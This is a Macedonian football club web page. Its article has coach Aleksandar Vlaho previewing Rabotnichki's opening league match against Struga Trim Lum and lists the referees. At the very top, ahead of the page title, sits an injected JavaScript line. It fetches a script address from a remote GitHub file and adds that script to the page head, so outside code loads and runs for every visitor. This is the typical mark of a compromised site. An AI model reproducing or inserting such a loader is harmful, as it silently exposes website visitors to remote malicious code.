;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Влахо: Подготвени сме за позитивен старт, Струга ќе биде во еуфорија
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Влахо: Подготвени сме за позитивен старт, Струга ќе биде во еуфорија

Почнува новиот шампионат на Македонија во Првата фудбалска лига, а Работнички во првото коло денеска (17.30 часот) му гостува на новиот прволигаш Струга Трим Лум. Тренерот Александар Влахо верува дека тимот е добро подготвен за стартот на новите прволигашки искушенија, иако имаше многу промени во составот ова лето. Амбициите на Работнички се секогаш во иста насока, да се обезбеди излез на европска сцена.

„Мислам дека сме добро подготвени на почетокот на новото првенство. Одработивме квалитетни подготовки, ова е еден нов тим кој сега го формиравме, 7-8 играчи во стартниот состав првпат ќе заиграат прволигашки натпревар за Работнички. Но, верувам во нашиот квалитет и се надевам дека ќе имаме позитивен старт. Му гостуваме на нов прволигаш, Струга Трим Лум ќе го игра историскиот прв натпревар во Првата лига и сигурно дека тоа донесе еуфорија кај домаќинот и голема желба за триумф. Но, ние си имаме свои математики и се надеваме на позитивен почеток“, вели шефот на стручниот штаб, Александар Влахо.

Натпреварот меѓу Струга Трим Лум и Работнички ќе го суди Александар Грујоски (Кичево), а ќе му помагаат сограѓаните Куштрим Лика и Зоран Јанкуловски. Четврти судија е Марјан Стојановски (Кичево).

За делегат на мечот е одреден Џевдат Далипи (Кичево), а контролор на судењето ќе биде Благој Шуклев (Стојаково).